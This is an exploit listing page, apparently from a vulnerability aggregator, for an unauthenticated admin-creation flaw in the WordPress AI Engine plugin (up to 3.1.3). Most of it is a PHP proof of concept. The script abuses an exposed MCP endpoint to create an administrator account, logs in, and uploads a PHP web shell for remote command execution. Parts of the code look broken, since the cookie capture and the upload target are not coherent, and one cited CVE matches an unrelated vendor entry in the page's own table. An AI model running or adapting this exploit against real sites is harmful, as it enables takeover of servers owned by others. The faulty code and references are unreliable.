📄 WordPress AI Engine 3.1.3 Add Admin / Shell Upload

🗓️ 04 Mar 2026 00:00:00Reported by indoushkaType

WordPress AI Engine 3.1.3 exposes unauthenticated admin creation causing remote code execution.

Reporter	Title	Published	Views	Family All 31
GithubExploit	Exploit for CVE-2025-11749	8 Nov 202503:19	–	githubexploit
Circl	CVE-2025-11749	4 Nov 202518:16	–	circl
CNNVD	SAMSUNG SMR 安全漏洞	5 Nov 202500:00	–	cnnvd
CNNVD	WordPress plugin AI Engine 信息泄露漏洞	5 Nov 202500:00	–	cnnvd
CVE	CVE-2025-11749	5 Nov 202505:31	–	cve
CVE	CVE-2025-21074	5 Nov 202505:40	–	cve
Cvelist	CVE-2025-11749 AI Engine <= 3.1.3 - Unauthenticated Sensitive Information Exposure to Privilege Escalation	5 Nov 202505:31	–	cvelist
Cvelist	CVE-2025-21074	5 Nov 202505:40	–	cvelist
EUVD	EUVD-2025-37802	5 Nov 202505:31	–	euvd
EUVD	EUVD-2025-37815	5 Nov 202505:40	–	euvd

=============================================================================================================================================
    | # Title     : WordPress AI Engine 3.1.3 Unauthenticated Admin Creation To RCE                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/ai-engine/                                                                                    |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212446/ & 	CVE-2025-21074
    
    [+] Summary : The AI Engine WordPress plugin exposes an MCP JSON RPC endpoint allowing unauthenticated calls to administrative functions. An attacker can remotely
                  create an administrator account then upload a malicious plugin or payload to obtain full RCE on the WordPress Server.
    
    [+] Attack Requirements
    
    - WordPress reachable (HTTP/HTTPS)
    - AI Engine plugin <= 3.1.3 installed
    - No authentication required
    
    [+] Attack Flow
    
    1) Enumerate MCP token via /wp-json/
    2) Create Administrator account
    3) Authenticate
    4) Upload PHP Payload
    5) Execute payload → RCE
    
    [+]  POC : 
    
    <?php
    /*
     * CVE-2025-11749 | WordPress AI Engine Unauth Admin → RCE
     * PoC by Indoushka
     */
    
    $target   = "http://victim.com";  // Target WP URL
    $username = "wpadmin1337";
    $password = "Sup3rP@ss!";
    $email    = "[email protected]";
    
    // Helper HTTP Post
    function http_post_json($url, $json){
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_HTTPHEADER     => ["Content-Type: application/json"],
            CURLOPT_POST           => true,
            CURLOPT_POSTFIELDS     => $json
        ]);
        $r = curl_exec($ch);
        curl_close($ch);
        return $r;
    }
    
    // Find MCP token
    function find_token($t){
        $routes = @file_get_contents("$t/wp-json/");
        preg_match_all("#/mcp/v1/([^/]+)/sse#", $routes, $m);
        return $m[1][0] ?? null;
    }
    
    $token = find_token($target);
    if(!$token){
        die("[!] MCP token not found. Probably patched.\n");
    }
    
    echo "[+] MCP token: $token\n";
    
    // Create admin
    $req = [
        "jsonrpc"=>"2.0",
        "id"=>rand(1,99999),
        "method"=>"tools/call",
        "params"=>[
            "name"=>"wp_create_user",
            "arguments"=>[
                "user_login"=>$username,
                "user_email"=>$email,
                "user_pass"=>$password,
                "role"=>"administrator"
            ]
        ]
    ];
    
    $r = http_post_json("$target/wp-json/mcp/v1/$token/sse", json_encode($req));
    echo "[+] Create user response:\n$r\n";
    
    // Login session cookie
    $login = http_post_json("$target/wp-login.php", http_build_query([
        "log"=>$username,
        "pwd"=>$password,
        "wp-submit"=>"Log In"
    ]));
    preg_match('/Set-Cookie:(.*?);/i',$login,$c);
    $cookie = trim($c[1] ?? "");
    echo "[+] Cookie: $cookie\n";
    
    // Simple RCE payload upload
    $payload_name = "z".rand(111,999).".php";
    $payload = "<?php echo shell_exec(\$_GET['cmd']); ?>";
    
    $boundary = "----".md5(time());
    $body  = "--$boundary\r\n";
    $body .= "Content-Disposition: form-data; name=\"file\"; filename=\"$payload_name\"\r\n";
    $body .= "Content-Type: application/x-php\r\n\r\n";
    $body .= $payload . "\r\n";
    $body .= "--$boundary--";
    
    $ch = curl_init("$target/wp-content/plugins/$payload_name");
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER=>true,
        CURLOPT_HTTPHEADER=>[
            "Cookie: $cookie",
            "Content-Type: multipart/form-data; boundary=$boundary"
        ],
        CURLOPT_POST=>true,
        CURLOPT_POSTFIELDS=>$body
    ]);
    curl_exec($ch);
    curl_close($ch);
    
    echo "[+] Payload uploaded: $payload_name\n";
    echo "[+] Execute: $target/wp-content/plugins/$payload_name?cmd=whoami\n";
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

04 Mar 2026 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 3.17.5 - 9.8

EPSS0.85391

SSVC